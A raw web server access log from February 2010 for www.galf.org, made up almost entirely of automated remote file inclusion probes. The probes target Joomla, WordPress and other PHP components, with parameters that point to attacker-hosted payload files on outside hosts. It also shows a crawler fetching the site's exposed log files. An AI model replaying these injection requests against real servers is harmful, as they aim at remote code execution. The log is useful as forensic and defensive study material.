85.12.33.30 - - [28/Feb/2010:21:26:56 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:59 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:00 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:00 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:04 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:05 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.35 - - [28/Feb/2010:21:27:32 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={5FB8C435-91A7-4d3f-A959-79C43F1D298F}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:27:46 -0800] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:53 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:54 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:56 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:58 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:58 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:27:58 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:28:12 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:28:12 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:28:12 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:21:28:40 -0800] "GET /logs/access_100118.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:28:56 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:30:01 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:30:01 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:30:02 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:21:31:24 -0800] "GET /logs/access_091019.log%20%20//skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:31:53 -0800] "GET /logs/access.log HTTP/1.1" 200 228290 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:31:56 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:31:57 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 2883584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:31:57 -0800] "GET /logs/access_091116.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:32:03 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 2686976 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:32:06 -0800] "GET /logs/access_091221.log HTTP/1.1" 200 2883584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:32:11 -0800] "GET /logs/access_100104.log HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:32:14 -0800] "GET /logs/access_100111.log HTTP/1.1" 200 2883584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:32:18 -0800] "GET /logs/access_100118.log HTTP/1.1" 200 2883584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:32:20 -0800] "GET /logs/scripts.log HTTP/1.1" 200 1798529 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:33:25 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:33:25 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:33:27 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:34:22 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:34:35 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:35:10 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:35:10 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:35:10 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:35:24 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:35:24 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.43.89.13 - - [28/Feb/2010:21:35:26 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tangocoffeebistro.com/components/com_joomlalib/standalone/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:35:42 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:35:42 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:35:42 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:35:42 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:35:50 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:35:50 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:36:03 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:36:51 -0800] "GET /logs/access_090727.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:36:51 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:36:51 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:36:55 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:36:55 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:36:55 -0800] "GET /logs/access_090727.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:36:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:36:59 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:37:00 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:37:02 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:37:02 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:37:02 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:37:05 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:37:05 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:37:06 -0800] "GET /logs/access_090907.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:37:10 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:37:10 -0800] "GET /logs/access_091221.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:37:10 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:37:28 -0800] "GET /logs/access_091221.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:37:28 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:37:28 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:37:35 -0800] "GET /logs/access_091207.log/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:37:58 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:38:07 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:38:07 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:38:07 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:38:13 -0800] "GET /logs/access_090824.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:38:30 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:38:30 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:38:30 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:38:31 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:38:31 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:38:31 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:38:53 -0800] "GET /logs//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:38:54 -0800] "GET /logs/access_091019.log%20%20//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:38:54 -0800] "GET /logs/access_091214.log%20%20//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:38:54 -0800] "GET /admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:39:31 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:39:31 -0800] "GET /logs/access_090907.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:39:31 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:39:43 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:40:02 -0800] "GET /logs/access_091214.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:40:03 -0800] "GET /logs/access_091214.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:21:40:24 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:21:40:24 -0800] "GET /logs/access_091221.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:21:40:24 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:40:52 -0800] "GET /logs/access_100222.log/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [28/Feb/2010:21:40:52 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
95.131.66.198 - - [28/Feb/2010:21:40:52 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
95.131.66.198 - - [28/Feb/2010:21:40:52 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.92.215.78 - - [28/Feb/2010:21:41:02 -0800] "GET /logs/access_091228.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:41:03 -0800] "GET /logs/access_091228.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:41:19 -0800] "GET /logs/access_091102.log%20%20//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:41:53 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:41:53 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:41:53 -0800] "GET /logs/access_100201.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:42:28 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:43:54 -0800] "GET /logs/access_090824.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:44:09 -0800] "GET /logs/access_091228.log//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.84.249.82 - - [28/Feb/2010:21:44:26 -0800] "GET /logs/access_091221.log//admin.remository.php?mosConfig.absolute.path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:44:49 -0800] "GET /logs/access_091214.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:44:49 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:21:45:06 -0800] "GET /logs/access_091228.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:45:15 -0800] "GET /logs/access_090907.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.218.166 - - [28/Feb/2010:21:45:15 -0800] "GET /logs/access_091214.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
